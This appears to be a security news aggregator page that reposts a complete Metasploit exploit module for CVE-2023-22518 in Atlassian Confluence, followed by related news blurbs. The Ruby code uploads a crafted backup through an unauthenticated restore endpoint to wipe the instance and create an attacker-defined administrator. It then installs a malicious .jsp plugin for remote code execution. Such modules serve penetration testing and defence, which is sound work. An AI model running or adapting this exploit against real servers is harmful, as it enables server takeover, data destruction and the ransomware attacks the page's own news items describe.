Security
Headlines
HeadlinesLatestCVEs

Headline

Atlassian Confluence Improper Authorization / Code Execution

This improper authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to the Confluence instance administrator. This Metasploit module uses the administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code execution on the target in the context of the of the user running the confluence server.

Packet Storm
#vulnerability#mac#js#git#java#rce#auth#jira#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::PayloadPlugin  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)',        'Description' => %q{          This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a          Confluence instance administrator account. Using this account, an attacker can then perform all          administrative actions that are available to Confluence instance administrator. This module uses the          administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code          execution on the target in the context of the of the user running the confluence server.        },        'Author' => [          'Atlassian', # Discovery          'jheysel-r7' # msf module        ],        'References' => [          [ 'URL', 'https://jira.atlassian.com/browse/CONFSERVER-93142'],          [ 'CVE', '2023-22518']        ],        'License' => MSF_LICENSE,        'Privileged' => false,        'Targets' => [          [            'Java',            {              'Platform' => 'java',              'Arch' => [ARCH_JAVA]            },          ]        ],        'DisclosureDate' => '2023-10-31',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ CONFIG_CHANGES, ], # Major config changes - this module overwrites the confluence server with an empty backup with known admin credentials          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        Opt::RPORT(8090),        OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),        OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),        # The endpoint we target to trigger the vulnerability.        OptEnum.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', '/json/setup-restore.action', ['/json/setup-restore.action', '/json/setup-restore-local.action', '/json/setup-restore-progress.action']]),        # We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait.        OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30])      ]    )  end  def check    confluence_version = get_confluence_version    return Exploit::CheckCode::Unknown('Unable to determine the confluence version') unless confluence_version    # Confluence Server and Confluence Data Center have the same vulnerable version ranges.    if confluence_version.between?(Rex::Version.new('1.0.0'), Rex::Version.new('7.19.15')) ||       confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) ||       confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) ||       confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2')) ||       confluence_version == Rex::Version.new('8.6.0')      return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")    end    Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")  end  # https://passlib.readthedocs.io/en/stable/lib/passlib.hash.atlassian_pbkdf2_sha1.html  def generate_hash(password)    salt = OpenSSL::Random.random_bytes(16)    iterations = 10000    digest = OpenSSL::Digest.new('SHA1')    key = OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, 32, digest)    salted_key = salt + key    encoded_hash = Base64.strict_encode64(salted_key)    '{PKCS5S2}' + encoded_hash  end  def create_zip    zip_file = Rex::Zip::Archive.new    # exportDescriptor.properties needs to be present in the zip file in order for it to be valid.    export_descriptor = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-22518', 'exportDescriptor.properties'))    zip_file.add_file('exportDescriptor.properties', export_descriptor)    entities_xml = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-22518', 'entities.xml'))    entities_xml.gsub!('NEW_USERNAME_LOWER', datastore['NEW_USERNAME'].downcase)    entities_xml.gsub!('NEW_USERNAME', datastore['NEW_USERNAME'])    entities_xml.gsub!('NEW_PASSWORD_HASH', generate_hash(datastore['NEW_PASSWORD']))    zip_file.add_file('entities.xml', entities_xml)    zip_file.pack  end  def upload_backup    zip_file = create_zip    post_data = Rex::MIME::Message.new    post_data.add_part('false', nil, nil, 'form-data; name="buildIndex"')    post_data.add_part('Upload and import', nil, nil, 'form-data; name="edit"')    post_data.add_part(zip_file, 'application/zip', 'binary', "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(8..16)}\"")    data = post_data.to_s    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT']),      'method' => 'POST',      'data' => data,      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'keep_cookies' => true,      'headers' => {        'X-Atlassian-Token' => 'no-check'      },      'vars_get' => {        'synchronous' => 'true'      }    }, 120)    fail_with(Failure::UnexpectedReply, "The endpoint #{datastore['CONFLUENCE_TARGET_ENDPOINT']} did not respond with a 302 or a 200") unless res&.code == 302 || res&.code == 200    print_good("Exploit Success! Login Using '#{datastore['NEW_USERNAME']} :: #{datastore['NEW_PASSWORD']}'")  end  def exploit    print_status("Setting credentials: #{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")    # Exploit CVE-2023-22518 by uploading a backup .zip file to confluence with an attacker defined username & password    upload_backup    # Now with admin access, upload a .jsp plugin using the PayloadPlugin mixin to gain RCE on the target system.    payload_endpoint = rand_text_alphanumeric(8)    plugin_key = rand_text_alpha(8)    begin      payload_plugin = generate_payload_plugin(plugin_key, payload_endpoint)      upload_payload_plugin(payload_plugin, datastore['NEW_USERNAME'], datastore['NEW_PASSWORD'])      trigger_payload_plugin(payload_endpoint)    ensure      delete_payload_plugin(plugin_key, payload_endpoint, datastore['NEW_USERNAME'], datastore['NEW_PASSWORD'])    end  endend

Related news

Google Fixes a Seventh Zero-Day Flaw in Chrome—Update Now

Plus: Major security patches from Microsoft, Mozilla, Atlassian, Cisco, and more.

Alert: 'Effluence' Backdoor Persists Despite Patching Atlassian Confluence Servers

Cybersecurity researchers have discovered a stealthy backdoor named Effluence that's deployed following the successful exploitation of a recently disclosed security flaw in Atlassian Confluence Data Center and Server. "The malware acts as a persistent backdoor and is not remediated by applying patches to Confluence," Aon's Stroz Friedberg Incident Response Services said in an analysis published

A new video series, Google Forms spam and the various gray areas of cyber attacks

It can be easy to get caught up in the “big” questions in cybersecurity, like how to stop ransomware globally or keep hospitals up and running when they’re targeted by data theft extortion.

Experts Warn of Ransomware Hackers Exploiting Atlassian and Apache Flaws

Multiple ransomware groups have begun to actively exploit recently disclosed flaws in Atlassian Confluence and Apache ActiveMQ. Cybersecurity firm Rapid7 said it observed the exploitation of CVE-2023-22518 and CVE-2023-22515 in multiple customer environments, some of which have been leveraged for the deployment of Cerber (aka C3RB3R) ransomware. Both vulnerabilities are critical, allowing threat

Atlassian: &#8220;Take immediate action&#8221; to patch your Confluence Data Center and Server instances

Atlassian has released an advisory about a critical severity authentication vulnerability in the Confluence Server and Data Center.

Atlassian Releases Urgent Confluence Patches Amid State-Backed Threats

By Deeba Ahmed Atlassian Confluence is a popular collaborative wiki system enterprises use to organize/share work. This is a post from HackRead.com Read the original post: Atlassian Releases Urgent Confluence Patches Amid State-Backed Threats

CVE-2023-22518: Improper Authorization in Confluence Data Center and Server - CVE-2023-22518

All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.

Atlassian Warns of New Critical Confluence Vulnerability Threatening Data Loss

Atlassian has warned of a critical security flaw in Confluence Data Center and Server that could result in "significant data loss if exploited by an unauthenticated attacker." Tracked as CVE-2023-22518, the vulnerability is rated 9.1 out of a maximum of 10 on the CVSS scoring system. It has been described as an instance of "improper authorization vulnerability." All versions of Confluence Data

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution